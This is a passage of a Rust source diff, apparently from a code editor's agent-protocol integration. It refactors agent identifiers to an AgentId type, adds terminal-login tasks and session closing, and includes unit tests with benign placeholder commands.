+ .expect("replay should succeed");
+ });
+
+ let plan = event_rx.expect_plan().await;
+ assert_eq!(
+ plan,
+ acp::Plan::new(vec![
+ acp::PlanEntry::new(
+ "Inspect the existing tool wiring",
+ acp::PlanEntryPriority::High,
+ acp::PlanEntryStatus::Completed,
+ ),
+ acp::PlanEntry::new(
+ "Implement the update_plan tool",
+ acp::PlanEntryPriority::Medium,
+ acp::PlanEntryStatus::InProgress,
+ ),
+ acp::PlanEntry::new(
+ "Add tests",
+ acp::PlanEntryPriority::Low,
+ acp::PlanEntryStatus::Pending,
+ ),
+ ])
+ );
+ }
+
+ #[gpui::test]
+ async fn test_run_defaults_priority_to_medium(cx: &mut TestAppContext) {
+ let tool = Arc::new(UpdatePlanTool);
+ let (event_stream, mut event_rx) = ToolCallEventStream::test();
+
+ let input = UpdatePlanToolInput {
+ plan: vec![
+ PlanItem {
+ step: "First".to_string(),
+ status: PlanEntryStatus::InProgress,
+ priority: PlanEntryPriority::default(),
+ },
+ PlanItem {
+ step: "Second".to_string(),
+ status: PlanEntryStatus::InProgress,
+ priority: PlanEntryPriority::default(),
+ },
+ ],
+ };
+
+ let result = cx
+ .update(|cx| tool.run(ToolInput::resolved(input), event_stream, cx))
+ .await
+ .expect("tool should succeed");
+
+ assert_eq!(result, "Plan updated".to_string());
+
+ let plan = event_rx.expect_plan().await;
+ assert_eq!(
+ plan,
+ acp::Plan::new(vec![
+ acp::PlanEntry::new(
+ "First",
+ acp::PlanEntryPriority::Medium,
+ acp::PlanEntryStatus::InProgress,
+ ),
+ acp::PlanEntry::new(
+ "Second",
+ acp::PlanEntryPriority::Medium,
+ acp::PlanEntryStatus::InProgress,
+ ),
+ ])
+ );
+ }
+
+ #[gpui::test]
+ async fn test_initial_title(cx: &mut TestAppContext) {
+ let tool = UpdatePlanTool;
+
+ let title = cx.update(|cx| tool.initial_title(Ok(sample_input()), cx));
+ assert_eq!(title, SharedString::from("Update plan"));
+
+ let title =
+ cx.update(|cx| tool.initial_title(Ok(UpdatePlanToolInput { plan: Vec::new() }), cx));
+ assert_eq!(title, SharedString::from("Clear plan"));
+ }
+}
@@ -30,6 +30,7 @@ env_logger = { workspace = true, optional = true }
fs.workspace = true
futures.workspace = true
gpui.workspace = true
+feature_flags.workspace = true
gpui_tokio = { workspace = true, optional = true }
credentials_provider.workspace = true
google_ai.workspace = true
@@ -7,20 +7,22 @@ use action_log::ActionLog;
use agent_client_protocol::{self as acp, Agent as _, ErrorCode};
use anyhow::anyhow;
use collections::HashMap;
+use feature_flags::{AcpBetaFeatureFlag, FeatureFlagAppExt as _};
use futures::AsyncBufReadExt as _;
use futures::io::BufReader;
-use project::Project;
-use project::agent_server_store::{AgentServerCommand, GEMINI_NAME};
+use project::agent_server_store::AgentServerCommand;
+use project::{AgentId, Project};
use serde::Deserialize;
use settings::Settings as _;
-use task::ShellBuilder;
+use task::{ShellBuilder, SpawnInTerminal};
use util::ResultExt as _;
+use util::path_list::PathList;
use util::process::Child;
use std::path::PathBuf;
use std::process::Stdio;
+use std::rc::Rc;
use std::{any::Any, cell::RefCell};
-use std::{path::Path, rc::Rc};
use thiserror::Error;
use anyhow::{Context as _, Result};
@@ -30,17 +32,21 @@ use acp_thread::{AcpThread, AuthRequired, LoadError, TerminalProviderEvent};
use terminal::TerminalBuilder;
use terminal::terminal_settings::{AlternateScroll, CursorShape, TerminalSettings};
+use crate::GEMINI_ID;
+
+pub const GEMINI_TERMINAL_AUTH_METHOD_ID: &str = "spawn-gemini-cli";
+
#[derive(Debug, Error)]
#[error("Unsupported version")]
pub struct UnsupportedVersion;
pub struct AcpConnection {
- server_name: SharedString,
- display_name: SharedString,
+ id: AgentId,
telemetry_id: SharedString,
connection: Rc<acp::ClientSideConnection>,
sessions: Rc<RefCell<HashMap<acp::SessionId, AcpSession>>>,
auth_methods: Vec<acp::AuthMethod>,
+ command: AgentServerCommand,
agent_capabilities: acp::AgentCapabilities,
default_mode: Option<acp::SessionModeId>,
default_model: Option<acp::ModelId>,
@@ -124,13 +130,14 @@ impl AgentSessionList for AcpSessionList {
.into_iter()
.map(|s| AgentSessionInfo {
session_id: s.session_id,
- cwd: Some(s.cwd),
+ work_dirs: Some(PathList::new(&[s.cwd])),
title: s.title.map(Into::into),
updated_at: s.updated_at.and_then(|date_str| {
chrono::DateTime::parse_from_rfc3339(&date_str)
.ok()
.map(|dt| dt.with_timezone(&chrono::Utc))
}),
+ created_at: None,
meta: s.meta,
})
.collect(),
@@ -157,8 +164,8 @@ impl AgentSessionList for AcpSessionList {
}
pub async fn connect(
- server_name: SharedString,
- display_name: SharedString,
+ agent_id: AgentId,
+ project: Entity<Project>,
command: AgentServerCommand,
default_mode: Option<acp::SessionModeId>,
default_model: Option<acp::ModelId>,
@@ -166,8 +173,8 @@ pub async fn connect(
cx: &mut AsyncApp,
) -> Result<Rc<dyn AgentConnection>> {
let conn = AcpConnection::stdio(
- server_name,
- display_name,
+ agent_id,
+ project,
command.clone(),
default_mode,
default_model,
@@ -182,8 +189,8 @@ const MINIMUM_SUPPORTED_VERSION: acp::ProtocolVersion = acp::ProtocolVersion::V1
impl AcpConnection {
pub async fn stdio(
- server_name: SharedString,
- display_name: SharedString,
+ agent_id: AgentId,
+ project: Entity<Project>,
command: AgentServerCommand,
default_mode: Option<acp::SessionModeId>,
default_model: Option<acp::ModelId>,
@@ -195,6 +202,15 @@ impl AcpConnection {
let mut child =
builder.build_std_command(Some(command.path.display().to_string()), &command.args);
child.envs(command.env.iter().flatten());
+ if let Some(cwd) = project.update(cx, |project, cx| {
+ project
+ .default_path_list(cx)
+ .ordered_paths()
+ .next()
+ .cloned()
+ }) {
+ child.current_dir(cwd);
+ }
let mut child = Child::spawn(child, Stdio::piped(), Stdio::piped(), Stdio::piped())?;
let stdout = child.stdout.take().context("Failed to take stdout")?;
@@ -269,7 +285,7 @@ impl AcpConnection {
cx.update(|cx| {
AcpConnectionRegistry::default_global(cx).update(cx, |registry, cx| {
- registry.set_active_connection(server_name.clone(), &connection, cx)
+ registry.set_active_connection(agent_id.clone(), &connection, cx)
});
});
@@ -278,10 +294,11 @@ impl AcpConnection {
acp::InitializeRequest::new(acp::ProtocolVersion::V1)
.client_capabilities(
acp::ClientCapabilities::new()
- .fs(acp::FileSystemCapability::new()
+ .fs(acp::FileSystemCapabilities::new()
.read_text_file(true)
.write_text_file(true))
.terminal(true)
+ .auth(acp::AuthCapabilities::new().terminal(true))
// Experimental: Allow for rendering terminal output from the agents
.meta(acp::Meta::from_iter([
("terminal_output".into(), true.into()),
@@ -304,7 +321,7 @@ impl AcpConnection {
// Use the one the agent provides if we have one
.map(|info| info.name.into())
// Otherwise, just use the name
- .unwrap_or_else(|| server_name.clone());
+ .unwrap_or_else(|| agent_id.0.to_string().into());
let session_list = if response
.agent_capabilities
@@ -320,9 +337,9 @@ impl AcpConnection {
};
// TODO: Remove this override once Google team releases their official auth methods
- let auth_methods = if server_name == GEMINI_NAME {
+ let auth_methods = if agent_id.0.as_ref() == GEMINI_ID {
let mut args = command.args.clone();
- args.retain(|a| a != "--experimental-acp");
+ args.retain(|a| a != "--experimental-acp" && a != "--acp");
let value = serde_json::json!({
"label": "gemini /auth",
"command": command.path.to_string_lossy().into_owned(),
@@ -330,19 +347,19 @@ impl AcpConnection {
"env": command.env.clone().unwrap_or_default(),
});
let meta = acp::Meta::from_iter([("terminal-auth".to_string(), value)]);
- vec![
- acp::AuthMethod::new("spawn-gemini-cli", "Login")
+ vec![acp::AuthMethod::Agent(
+ acp::AuthMethodAgent::new(GEMINI_TERMINAL_AUTH_METHOD_ID, "Login")
.description("Login with your Google or Vertex AI account")
.meta(meta),
- ]
+ )]
} else {
response.auth_methods
};
Ok(Self {
+ id: agent_id,
auth_methods,
+ command,
connection,
- server_name,
- display_name,
telemetry_id,
sessions,
agent_capabilities: response.agent_capabilities,
@@ -360,6 +377,102 @@ impl AcpConnection {
pub fn prompt_capabilities(&self) -> &acp::PromptCapabilities {
&self.agent_capabilities.prompt_capabilities
}
+
+ fn apply_default_config_options(
+ &self,
+ session_id: &acp::SessionId,
+ config_options: &Rc<RefCell<Vec<acp::SessionConfigOption>>>,
+ cx: &mut AsyncApp,
+ ) {
+ let id = self.id.clone();
+ let defaults_to_apply: Vec<_> = {
+ let config_opts_ref = config_options.borrow();
+ config_opts_ref
+ .iter()
+ .filter_map(|config_option| {
+ let default_value = self.default_config_options.get(&*config_option.id.0)?;
+
+ let is_valid = match &config_option.kind {
+ acp::SessionConfigKind::Select(select) => match &select.options {
+ acp::SessionConfigSelectOptions::Ungrouped(options) => options
+ .iter()
+ .any(|opt| &*opt.value.0 == default_value.as_str()),
+ acp::SessionConfigSelectOptions::Grouped(groups) => {
+ groups.iter().any(|g| {
+ g.options
+ .iter()
+ .any(|opt| &*opt.value.0 == default_value.as_str())
+ })
+ }
+ _ => false,
+ },
+ _ => false,
+ };
+
+ if is_valid {
+ let initial_value = match &config_option.kind {
+ acp::SessionConfigKind::Select(select) => {
+ Some(select.current_value.clone())
+ }
+ _ => None,
+ };
+ Some((
+ config_option.id.clone(),
+ default_value.clone(),
+ initial_value,
+ ))
+ } else {
+ log::warn!(
+ "`{}` is not a valid value for config option `{}` in {}",
+ default_value,
+ config_option.id.0,
+ id
+ );
+ None
+ }
+ })
+ .collect()
+ };
+
+ for (config_id, default_value, initial_value) in defaults_to_apply {
+ cx.spawn({
+ let default_value_id = acp::SessionConfigValueId::new(default_value.clone());
+ let session_id = session_id.clone();
+ let config_id_clone = config_id.clone();
+ let config_opts = config_options.clone();
+ let conn = self.connection.clone();
+ async move |_| {
+ let result = conn
+ .set_session_config_option(acp::SetSessionConfigOptionRequest::new(
+ session_id,
+ config_id_clone.clone(),
+ default_value_id,
+ ))
+ .await
+ .log_err();
+
+ if result.is_none() {
+ if let Some(initial) = initial_value {
+ let mut opts = config_opts.borrow_mut();
+ if let Some(opt) = opts.iter_mut().find(|o| o.id == config_id_clone) {
+ if let acp::SessionConfigKind::Select(select) = &mut opt.kind {
+ select.current_value = initial;
+ }
+ }
+ }
+ }
+ }
+ })
+ .detach();
+
+ let mut opts = config_options.borrow_mut();
+ if let Some(opt) = opts.iter_mut().find(|o| o.id == config_id) {
+ if let acp::SessionConfigKind::Select(select) = &mut opt.kind {
+ select.current_value = acp::SessionConfigValueId::new(default_value);
+ }
+ }
+ }
+ }
}
impl Drop for AcpConnection {
@@ -368,7 +481,69 @@ impl Drop for AcpConnection {
}
}
+fn terminal_auth_task_id(agent_id: &AgentId, method_id: &acp::AuthMethodId) -> String {
+ format!("external-agent-{}-{}-login", agent_id.0, method_id.0)
+}
+
+fn terminal_auth_task(
+ command: &AgentServerCommand,
+ agent_id: &AgentId,
+ method: &acp::AuthMethodTerminal,
+) -> SpawnInTerminal {
+ let mut args = command.args.clone();
+ args.extend(method.args.clone());
+
+ let mut env = command.env.clone().unwrap_or_default();
+ env.extend(method.env.clone());
+
+ acp_thread::build_terminal_auth_task(
+ terminal_auth_task_id(agent_id, &method.id),
+ method.name.clone(),
+ command.path.to_string_lossy().into_owned(),
+ args,
+ env,
+ )
+}
+
+/// Supports terminal auth declared via the legacy `_meta` field on an auth method, prior to first-class terminal auth stabilizing.
+fn meta_terminal_auth_task(
+ agent_id: &AgentId,
+ method_id: &acp::AuthMethodId,
+ method: &acp::AuthMethod,
+) -> Option<SpawnInTerminal> {
+ #[derive(Deserialize)]
+ struct MetaTerminalAuth {
+ label: String,
+ command: String,
+ #[serde(default)]
+ args: Vec<String>,
+ #[serde(default)]
+ env: HashMap<String, String>,
+ }
+
+ let meta = match method {
+ acp::AuthMethod::EnvVar(env_var) => env_var.meta.as_ref(),
+ acp::AuthMethod::Terminal(terminal) => terminal.meta.as_ref(),
+ acp::AuthMethod::Agent(agent) => agent.meta.as_ref(),
+ _ => None,
+ }?;
+ let terminal_auth =
+ serde_json::from_value::<MetaTerminalAuth>(meta.get("terminal-auth")?.clone()).ok()?;
+
+ Some(acp_thread::build_terminal_auth_task(
+ terminal_auth_task_id(agent_id, method_id),
+ terminal_auth.label.clone(),
+ terminal_auth.command,
+ terminal_auth.args,
+ terminal_auth.env,
+ ))
+}
+
impl AgentConnection for AcpConnection {
+ fn agent_id(&self) -> AgentId {
+ self.id.clone()
+ }
+
fn telemetry_id(&self) -> SharedString {
self.telemetry_id.clone()
}
@@ -376,11 +551,14 @@ impl AgentConnection for AcpConnection {
fn new_session(
self: Rc<Self>,
project: Entity<Project>,
- cwd: &Path,
+ work_dirs: PathList,
cx: &mut App,
) -> Task<Result<Entity<AcpThread>>> {
- let name = self.server_name.clone();
- let cwd = cwd.to_path_buf();
+ // TODO: remove this once ACP supports multiple working directories
+ let Some(cwd) = work_dirs.ordered_paths().next().cloned() else {
+ return Task::ready(Err(anyhow!("Working directory cannot be empty")));
+ };
+ let name = self.id.0.clone();
let mcp_servers = mcp_servers_for_project(&project, cx);
cx.spawn(async move |cx| {
@@ -470,97 +648,15 @@ impl AgentConnection for AcpConnection {
}
if let Some(config_opts) = config_options.as_ref() {
- let defaults_to_apply: Vec<_> = {
- let config_opts_ref = config_opts.borrow();
- config_opts_ref
- .iter()
- .filter_map(|config_option| {
- let default_value = self.default_config_options.get(&*config_option.id.0)?;
-
- let is_valid = match &config_option.kind {
- acp::SessionConfigKind::Select(select) => match &select.options {
- acp::SessionConfigSelectOptions::Ungrouped(options) => {
- options.iter().any(|opt| &*opt.value.0 == default_value.as_str())
- }
- acp::SessionConfigSelectOptions::Grouped(groups) => groups
- .iter()
- .any(|g| g.options.iter().any(|opt| &*opt.value.0 == default_value.as_str())),
- _ => false,
- },
- _ => false,
- };
-
- if is_valid {
- let initial_value = match &config_option.kind {
- acp::SessionConfigKind::Select(select) => {
- Some(select.current_value.clone())
- }
- _ => None,
- };
- Some((config_option.id.clone(), default_value.clone(), initial_value))
- } else {
- log::warn!(
- "`{}` is not a valid value for config option `{}` in {}",
- default_value,
- config_option.id.0,
- name
- );
- None
- }
- })
- .collect()
- };
-
- for (config_id, default_value, initial_value) in defaults_to_apply {
- cx.spawn({
- let default_value_id = acp::SessionConfigValueId::new(default_value.clone());
- let session_id = response.session_id.clone();
- let config_id_clone = config_id.clone();
- let config_opts = config_opts.clone();
- let conn = self.connection.clone();
- async move |_| {
- let result = conn
- .set_session_config_option(
- acp::SetSessionConfigOptionRequest::new(
- session_id,
- config_id_clone.clone(),
- default_value_id,
- ),
- )
- .await
- .log_err();
-
- if result.is_none() {
- if let Some(initial) = initial_value {
- let mut opts = config_opts.borrow_mut();
- if let Some(opt) = opts.iter_mut().find(|o| o.id == config_id_clone) {
- if let acp::SessionConfigKind::Select(select) =
- &mut opt.kind
- {
- select.current_value = initial;
- }
- }
- }
- }
- }
- })
- .detach();
-
- let mut opts = config_opts.borrow_mut();
- if let Some(opt) = opts.iter_mut().find(|o| o.id == config_id) {
- if let acp::SessionConfigKind::Select(select) = &mut opt.kind {
- select.current_value = acp::SessionConfigValueId::new(default_value);
- }
- }
- }
+ self.apply_default_config_options(&response.session_id, config_opts, cx);
}
let action_log = cx.new(|_| ActionLog::new(project.clone()));
let thread: Entity<AcpThread> = cx.new(|cx| {
AcpThread::new(
None,
- self.display_name.clone(),
- Some(cwd),
+ None,
+ Some(work_dirs),
self.clone(),
project,
action_log,
@@ -601,7 +697,7 @@ impl AgentConnection for AcpConnection {
self: Rc<Self>,
session_id: acp::SessionId,
project: Entity<Project>,
- cwd: &Path,
+ work_dirs: PathList,
title: Option<SharedString>,
cx: &mut App,
) -> Task<Result<Entity<AcpThread>>> {
@@ -610,16 +706,18 @@ impl AgentConnection for AcpConnection {
"Loading sessions is not supported by this agent.".into()
))));
}
+ // TODO: remove this once ACP supports multiple working directories
+ let Some(cwd) = work_dirs.ordered_paths().next().cloned() else {
+ return Task::ready(Err(anyhow!("Working directory cannot be empty")));
+ };
- let cwd = cwd.to_path_buf();
let mcp_servers = mcp_servers_for_project(&project, cx);
let action_log = cx.new(|_| ActionLog::new(project.clone()));
- let title = title.unwrap_or_else(|| self.display_name.clone());
let thread: Entity<AcpThread> = cx.new(|cx| {
AcpThread::new(
None,
title,
- Some(cwd.clone()),
+ Some(work_dirs.clone()),
self.clone(),
project,
action_log,
@@ -640,7 +738,7 @@ impl AgentConnection for AcpConnection {
},
);
- cx.spawn(async move |_| {
+ cx.spawn(async move |cx| {
let response = match self
.connection
.load_session(
@@ -657,6 +755,11 @@ impl AgentConnection for AcpConnection {
let (modes, models, config_options) =
config_state(response.modes, response.models, response.config_options);
+
+ if let Some(config_opts) = config_options.as_ref() {
+ self.apply_default_config_options(&session_id, config_opts, cx);
+ }
+
if let Some(session) = self.sessions.borrow_mut().get_mut(&session_id) {
session.session_modes = modes;
session.models = models;
@@ -671,7 +774,7 @@ impl AgentConnection for AcpConnection {
self: Rc<Self>,
session_id: acp::SessionId,
project: Entity<Project>,
- cwd: &Path,
+ work_dirs: PathList,
title: Option<SharedString>,
cx: &mut App,
) -> Task<Result<Entity<AcpThread>>> {
@@ -685,16 +788,18 @@ impl AgentConnection for AcpConnection {
"Resuming sessions is not supported by this agent.".into()
))));
}
+ // TODO: remove this once ACP supports multiple working directories
+ let Some(cwd) = work_dirs.ordered_paths().next().cloned() else {
+ return Task::ready(Err(anyhow!("Working directory cannot be empty")));
+ };
- let cwd = cwd.to_path_buf();
let mcp_servers = mcp_servers_for_project(&project, cx);
let action_log = cx.new(|_| ActionLog::new(project.clone()));
- let title = title.unwrap_or_else(|| self.display_name.clone());
let thread: Entity<AcpThread> = cx.new(|cx| {
AcpThread::new(
None,
title,
- Some(cwd.clone()),
+ Some(work_dirs),
self.clone(),
project,
action_log,
@@ -715,7 +820,7 @@ impl AgentConnection for AcpConnection {
},
);
- cx.spawn(async move |_| {
+ cx.spawn(async move |cx| {
let response = match self
.connection
.resume_session(
@@ -733,6 +838,11 @@ impl AgentConnection for AcpConnection {
let (modes, models, config_options) =
config_state(response.modes, response.models, response.config_options);
+
+ if let Some(config_opts) = config_options.as_ref() {
+ self.apply_default_config_options(&session_id, config_opts, cx);
+ }
+
if let Some(session) = self.sessions.borrow_mut().get_mut(&session_id) {
session.session_modes = modes;
session.models = models;
@@ -743,10 +853,53 @@ impl AgentConnection for AcpConnection {
})
}
+ fn supports_close_session(&self) -> bool {
+ self.agent_capabilities.session_capabilities.close.is_some()
+ }
+
+ fn close_session(
+ self: Rc<Self>,
+ session_id: &acp::SessionId,
+ cx: &mut App,
+ ) -> Task<Result<()>> {
+ if !self.supports_close_session() {
+ return Task::ready(Err(anyhow!(LoadError::Other(
+ "Closing sessions is not supported by this agent.".into()
+ ))));
+ }
+
+ let conn = self.connection.clone();
+ let session_id = session_id.clone();
+ cx.foreground_executor().spawn(async move {
+ conn.close_session(acp::CloseSessionRequest::new(session_id.clone()))
+ .await?;
+ self.sessions.borrow_mut().remove(&session_id);
+ Ok(())
+ })
+ }
+
fn auth_methods(&self) -> &[acp::AuthMethod] {
&self.auth_methods
}
+ fn terminal_auth_task(
+ &self,
+ method_id: &acp::AuthMethodId,
+ cx: &App,
+ ) -> Option<SpawnInTerminal> {
+ let method = self
+ .auth_methods
+ .iter()
+ .find(|method| method.id() == method_id)?;
+
+ match method {
+ acp::AuthMethod::Terminal(terminal) if cx.has_flag::<AcpBetaFeatureFlag>() => {
+ Some(terminal_auth_task(&self.command, &self.id, terminal))
+ }
+ _ => meta_terminal_auth_task(&self.id, method_id, method),
+ }
+ }
+
fn authenticate(&self, method_id: acp::AuthMethodId, cx: &mut App) -> Task<Result<()>> {
let conn = self.connection.clone();
cx.foreground_executor().spawn(async move {
@@ -913,6 +1066,149 @@ fn map_acp_error(err: acp::Error) -> anyhow::Error {
}
}
+#[cfg(test)]
+mod tests {
+ use super::*;
+
+ #[test]
+ fn terminal_auth_task_reuses_command_and_merges_args_and_env() {
+ let command = AgentServerCommand {
+ path: "/path/to/agent".into(),
+ args: vec!["--acp".into(), "--verbose".into()],
+ env: Some(HashMap::from_iter([
+ ("BASE".into(), "1".into()),
+ ("SHARED".into(), "base".into()),
+ ])),
+ };
+ let method = acp::AuthMethodTerminal::new("login", "Login")
+ .args(vec!["/auth".into()])
+ .env(std::collections::HashMap::from_iter([
+ ("EXTRA".into(), "2".into()),
+ ("SHARED".into(), "override".into()),
+ ]));
+
+ let terminal_auth_task = terminal_auth_task(&command, &AgentId::new("test-agent"), &method);
+
+ assert_eq!(
+ terminal_auth_task.command.as_deref(),
+ Some("/path/to/agent")
+ );
+ assert_eq!(terminal_auth_task.args, vec!["--acp", "--verbose", "/auth"]);
+ assert_eq!(
+ terminal_auth_task.env,
+ HashMap::from_iter([
+ ("BASE".into(), "1".into()),
+ ("SHARED".into(), "override".into()),
+ ("EXTRA".into(), "2".into()),
+ ])
+ );
+ assert_eq!(terminal_auth_task.label, "Login");
+ assert_eq!(terminal_auth_task.command_label, "Login");
+ }
+
+ #[test]
+ fn legacy_terminal_auth_task_parses_meta_and_retries_session() {
+ let method_id = acp::AuthMethodId::new("legacy-login");
+ let method = acp::AuthMethod::Agent(
+ acp::AuthMethodAgent::new(method_id.clone(), "Login").meta(acp::Meta::from_iter([(
+ "terminal-auth".to_string(),
+ serde_json::json!({
+ "label": "legacy /auth",
+ "command": "legacy-agent",
+ "args": ["auth", "--interactive"],
+ "env": {
+ "AUTH_MODE": "interactive",
+ },
+ }),
+ )])),
+ );
+
+ let terminal_auth_task =
+ meta_terminal_auth_task(&AgentId::new("test-agent"), &method_id, &method)
+ .expect("expected legacy terminal auth task");
+
+ assert_eq!(
+ terminal_auth_task.id.0,
+ "external-agent-test-agent-legacy-login-login"
+ );
+ assert_eq!(terminal_auth_task.command.as_deref(), Some("legacy-agent"));
+ assert_eq!(terminal_auth_task.args, vec!["auth", "--interactive"]);
+ assert_eq!(
+ terminal_auth_task.env,
+ HashMap::from_iter([("AUTH_MODE".into(), "interactive".into())])
+ );
+ assert_eq!(terminal_auth_task.label, "legacy /auth");
+ }
+
+ #[test]
+ fn legacy_terminal_auth_task_returns_none_for_invalid_meta() {
+ let method_id = acp::AuthMethodId::new("legacy-login");
+ let method = acp::AuthMethod::Agent(
+ acp::AuthMethodAgent::new(method_id.clone(), "Login").meta(acp::Meta::from_iter([(
+ "terminal-auth".to_string(),
+ serde_json::json!({
+ "label": "legacy /auth",
+ }),
+ )])),
+ );
+
+ assert!(
+ meta_terminal_auth_task(&AgentId::new("test-agent"), &method_id, &method).is_none()
+ );
+ }
+
+ #[test]
+ fn first_class_terminal_auth_takes_precedence_over_legacy_meta() {
+ let method_id = acp::AuthMethodId::new("login");
+ let method = acp::AuthMethod::Terminal(
+ acp::AuthMethodTerminal::new(method_id, "Login")
+ .args(vec!["/auth".into()])
+ .env(std::collections::HashMap::from_iter([(
+ "AUTH_MODE".into(),
+ "first-class".into(),
+ )]))
+ .meta(acp::Meta::from_iter([(
+ "terminal-auth".to_string(),
+ serde_json::json!({
+ "label": "legacy /auth",
+ "command": "legacy-agent",
+ "args": ["legacy-auth"],
+ "env": {
+ "AUTH_MODE": "legacy",
+ },
+ }),
+ )])),
+ );
+
+ let command = AgentServerCommand {
+ path: "/path/to/agent".into(),
+ args: vec!["--acp".into()],
+ env: Some(HashMap::from_iter([("BASE".into(), "1".into())])),
+ };
+
+ let terminal_auth_task = match &method {
+ acp::AuthMethod::Terminal(terminal) => {
+ terminal_auth_task(&command, &AgentId::new("test-agent"), terminal)
+ }
+ _ => unreachable!(),
+ };
+
+ assert_eq!(
+ terminal_auth_task.command.as_deref(),
+ Some("/path/to/agent")
+ );
+ assert_eq!(terminal_auth_task.args, vec!["--acp", "/auth"]);
+ assert_eq!(
+ terminal_auth_task.env,
+ HashMap::from_iter([
+ ("BASE".into(), "1".into()),
+ ("AUTH_MODE".into(), "first-class".into()),
+ ])
+ );
+ assert_eq!(terminal_auth_task.label, "Login");
+ }
+}
+
fn mcp_servers_for_project(project: &Entity<Project>, cx: &App) -> Vec<acp::McpServer> {
let context_server_store = project.read(cx).context_server_store().read(cx);
let is_local = project.read(cx).is_local();
@@ -1167,7 +1463,7 @@ impl acp::Client for ClientDelegate {
let outcome = task.await;
- Ok(acp::RequestPermissionResponse::new(outcome))
+ Ok(acp::RequestPermissionResponse::new(outcome.into()))
}
async fn write_text_file(
@@ -1372,10 +1668,10 @@ impl acp::Client for ClientDelegate {
Ok(acp::CreateTerminalResponse::new(terminal_id))
}
- async fn kill_terminal_command(
+ async fn kill_terminal(
&self,
- args: acp::KillTerminalCommandRequest,
- ) -> Result<acp::KillTerminalCommandResponse, acp::Error> {
+ args: acp::KillTerminalRequest,
+ ) -> Result<acp::KillTerminalResponse, acp::Error> {
self.session_thread(&args.session_id)?
.update(&mut self.cx.clone(), |thread, cx| {
thread.kill_terminal(args.terminal_id, cx)
@@ -9,50 +9,40 @@ use collections::{HashMap, HashSet};
pub use custom::*;
use fs::Fs;
use http_client::read_no_proxy_from_env;
-use project::agent_server_store::AgentServerStore;
+use project::{AgentId, Project, agent_server_store::AgentServerStore};
use acp_thread::AgentConnection;
use anyhow::Result;
-use gpui::{App, AppContext, Entity, SharedString, Task};
-use project::Project;
+use gpui::{App, AppContext, Entity, Task};
use settings::SettingsStore;
use std::{any::Any, rc::Rc, sync::Arc};
-pub use acp::AcpConnection;
+pub use acp::{AcpConnection, GEMINI_TERMINAL_AUTH_METHOD_ID};
pub struct AgentServerDelegate {
store: Entity<AgentServerStore>,
- project: Entity<Project>,
- status_tx: Option<watch::Sender<SharedString>>,
new_version_available: Option<watch::Sender<Option<String>>>,
}
impl AgentServerDelegate {
pub fn new(
store: Entity<AgentServerStore>,
- project: Entity<Project>,
- status_tx: Option<watch::Sender<SharedString>>,
new_version_tx: Option<watch::Sender<Option<String>>>,
) -> Self {
Self {
store,
- project,
- status_tx,
new_version_available: new_version_tx,
}
}
-
- pub fn project(&self) -> &Entity<Project> {
- &self.project
- }
}
pub trait AgentServer: Send {
fn logo(&self) -> ui::IconName;
- fn name(&self) -> SharedString;
+ fn agent_id(&self) -> AgentId;
fn connect(
&self,
delegate: AgentServerDelegate,
+ project: Entity<Project>,
cx: &mut App,
) -> Task<Result<Rc<dyn AgentConnection>>>;
@@ -5,29 +5,34 @@ use anyhow::{Context as _, Result};
use collections::HashSet;
use credentials_provider::CredentialsProvider;
use fs::Fs;
-use gpui::{App, AppContext as _, SharedString, Task};
+use gpui::{App, AppContext as _, Entity, Task};
use language_model::{ApiKey, EnvVar};
-use project::agent_server_store::{
- AllAgentServersSettings, CLAUDE_AGENT_NAME, CODEX_NAME, ExternalAgentServerName, GEMINI_NAME,
+use project::{
+ Project,
+ agent_server_store::{AgentId, AllAgentServersSettings},
};
use settings::{SettingsStore, update_settings_file};
use std::{rc::Rc, sync::Arc};
use ui::IconName;
+pub const GEMINI_ID: &str = "gemini";
+pub const CLAUDE_AGENT_ID: &str = "claude-acp";
+pub const CODEX_ID: &str = "codex-acp";
+
/// A generic agent server implementation for custom user-defined agents
pub struct CustomAgentServer {
- name: SharedString,
+ agent_id: AgentId,
}
impl CustomAgentServer {
- pub fn new(name: SharedString) -> Self {
- Self { name }
+ pub fn new(agent_id: AgentId) -> Self {
+ Self { agent_id }
}
}
impl AgentServer for CustomAgentServer {
- fn name(&self) -> SharedString {
- self.name.clone()
+ fn agent_id(&self) -> AgentId {
+ self.agent_id.clone()
}
fn logo(&self) -> IconName {
@@ -38,7 +43,7 @@ impl AgentServer for CustomAgentServer {
let settings = cx.read_global(|settings: &SettingsStore, _| {
settings
.get::<AllAgentServersSettings>(None)
- .get(self.name().as_ref())
+ .get(self.agent_id().0.as_ref())
.cloned()
});
@@ -55,7 +60,7 @@ impl AgentServer for CustomAgentServer {
let settings = cx.read_global(|settings: &SettingsStore, _| {
settings
.get::<AllAgentServersSettings>(None)
- .get(self.name().as_ref())
+ .get(self.agent_id().0.as_ref())
.cloned()
});
@@ -80,7 +85,7 @@ impl AgentServer for CustomAgentServer {
fs: Arc<dyn Fs>,
cx: &App,
) {
- let name = self.name();
+ let agent_id = self.agent_id();
let config_id = config_id.to_string();
let value_id = value_id.to_string();
@@ -88,8 +93,8 @@ impl AgentServer for CustomAgentServer {
let settings = settings
.agent_servers
.get_or_insert_default()
- .entry(name.to_string())
- .or_insert_with(|| default_settings_for_agent(&name, cx));
+ .entry(agent_id.0.to_string())
+ .or_insert_with(|| default_settings_for_agent(agent_id, cx));
match settings {
settings::CustomAgentServerSettings::Custom {
@@ -124,13 +129,13 @@ impl AgentServer for CustomAgentServer {
}
fn set_default_mode(&self, mode_id: Option<acp::SessionModeId>, fs: Arc<dyn Fs>, cx: &mut App) {
- let name = self.name();
+ let agent_id = self.agent_id();
update_settings_file(fs, cx, move |settings, cx| {
let settings = settings
.agent_servers
.get_or_insert_default()
- .entry(name.to_string())
- .or_insert_with(|| default_settings_for_agent(&name, cx));
+ .entry(agent_id.0.to_string())
+ .or_insert_with(|| default_settings_for_agent(agent_id, cx));
match settings {
settings::CustomAgentServerSettings::Custom { default_mode, .. }
@@ -146,7 +151,7 @@ impl AgentServer for CustomAgentServer {
let settings = cx.read_global(|settings: &SettingsStore, _| {
settings
.get::<AllAgentServersSettings>(None)
- .get(self.name().as_ref())
+ .get(self.agent_id().as_ref())
.cloned()
});
@@ -156,13 +161,13 @@ impl AgentServer for CustomAgentServer {
}
fn set_default_model(&self, model_id: Option<acp::ModelId>, fs: Arc<dyn Fs>, cx: &mut App) {
- let name = self.name();
+ let agent_id = self.agent_id();
update_settings_file(fs, cx, move |settings, cx| {
let settings = settings
.agent_servers
.get_or_insert_default()
- .entry(name.to_string())
- .or_insert_with(|| default_settings_for_agent(&name, cx));
+ .entry(agent_id.0.to_string())
